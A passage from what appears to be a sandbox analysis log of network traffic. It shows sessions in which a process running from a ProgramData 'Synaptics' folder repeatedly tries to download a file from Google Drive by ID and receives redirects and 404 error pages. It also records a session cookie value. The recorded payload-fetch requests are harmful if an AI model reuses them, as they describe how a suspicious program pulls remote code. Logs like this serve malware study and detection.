                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:14 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:14 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-x6oW3kMRFZBK1U46azDRZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            17192.168.2.849752142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:14 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:14 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:14 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-P6BXlih2mwyBOVQt2ur2Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            18192.168.2.849759142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:15 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:15 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:15 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-2frcjEo0qJf9QSxHlujirA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            19192.168.2.849757142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:15 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:15 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7R7cFxHHtcni0KPFTj5q7gcGz3m9hostSfU-fTNgGDYaOt5FkB4DphgEuYoOUVoeQ1
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:15 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-Blns3e0y17h3wWXwHASITg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:15 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:15 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 73 75 4c 69 57 39 63 76 48 5a 44 62 4e 43 55 79 47 63 73 36 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="xsuLiW9cvHZDbNCUyGcs6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:15 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            20192.168.2.849758142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:15 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:15 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC6-1JdaQmk17vmEfhkT175RaNvBIADOPkLIBECW2mQlgEB6zXA9BGAaM-rtx6_k7Xwt
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:15 GMT
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-kg5RHtC-4wM3TL9NMBvF7w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:15 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:15 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 52 75 62 57 47 4e 30 39 42 71 5f 71 4c 5f 54 43 36 46 62 53 76 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="RubWGN09Bq_qL_TC6FbSvw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:15 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            21192.168.2.849756142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:15 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:15 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:15 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-m6QYlABmYv6mTwNThfnFpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            22192.168.2.849762142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:16 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:16 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC5QpUgdRP6MCVpKSz8l7xbMelIWQQJjtXR-FXs2PUCTgNbo6W2OW67FslBwXge6LLAgpd6NV64
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:16 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-jXj_LjpmeKAe1s8vFFvzjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:16 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:16 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 58 72 62 61 4a 6c 37 5f 71 4d 4e 56 52 54 41 70 71 69 78 76 37 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="XrbaJl7_qMNVRTApqixv7g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:16 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            23192.168.2.849761142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:16 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
